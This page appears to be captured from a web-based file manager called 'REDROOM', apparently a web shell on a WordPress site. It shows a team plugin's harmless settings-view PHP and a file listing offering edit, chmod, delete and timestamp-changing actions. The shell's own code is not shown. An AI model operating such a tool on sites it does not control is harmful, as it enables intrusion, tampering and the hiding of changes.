REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 2.19 KB
Close
//home/nshryvcy/blissfulnepal.com/wp-content/plugins/tlp-team/resources/settings.php
Text
Base64
<?php /** * Settings view. */ use RT\Team\Helpers\Fns; use RT\Team\Helpers\Options; // Do not allow directly accessing this file. if ( ! defined( 'ABSPATH' ) ) { exit( 'This script cannot be accessed directly.' ); } ?> <div class="tlp-wrap"> <div id="tlp-team-setting-wrapper"> <?php Fns::render_view( 'settings-header' ); ?> <div class="tlp-team-setting-container"> <form id="tlp-team-settings"> <?php wp_nonce_field( Fns::nonceText(), Fns::nonceID() ); $html = null; $html .= '<div id="settings-tabs" class="tlp-tabs rt-tab-container">'; $html .= '<div class="rt-settings-sidebar">'; $html .= '<ul class="tab-nav rt-tab-nav"> <li class="active"><a href="#general-settings"><i class="dashicons dashicons-admin-settings"></i>' . esc_html__( 'General Settings', 'tlp-team' ) . '</a></li> <li><a href="#detail-field-selection"><i class="dashicons dashicons-editor-table"></i>' . esc_html__( 'Detail page field selection', 'tlp-team' ) . '</a></li> ' . apply_filters( 'rttm_license_tab', '' ) . ' </ul>'; $html .= '</div>'; $html .= '<div class="rt-settings-content">'; $html .= '<div id="general-settings" class="rt-tab-content" style="display: block;">'; $html .= Fns::rtFieldGenerator( Options::tlpTeamGeneralSettingFields() ); $html .= '</div>'; $html .= '<div id="detail-field-selection" class="rt-tab-content">'; $html .= Fns::rtFieldGenerator( Options::tlpTeamDetailFieldSelection() ); $html .= '</div>'; $html .= apply_filters( 'rttm_license_tab_content', '' ); $html .= '<p class="rt-submit"><input type="submit" name="submit" id="tlpSaveButton" class="button button-primary rt-admin-btn" value="Save Changes"></p>'; $html .= '</div>'; if (! rttlp_team()->has_pro() ) { $html .= Fns::render_view( 'settings-promo',[],true ); } $html .= '</div>'; $html .= '</div>'; Fns::print_html( $html, true ); ?> <?php wp_nonce_field( Fns::nonceText(), Fns::nonceID() ); ?> </form> <div id="rt-response"></div> </div> </div> </div>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 6
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
get-help.php
8.58 KB
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
index.php
30 B
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
settings-header.php
8.33 KB
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
settings-promo.php
1.75 KB
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
settings.php
2.19 KB
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
taxonomy-order.php
1.28 KB
lrw-r--r--
2026-06-03 14:57:33
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).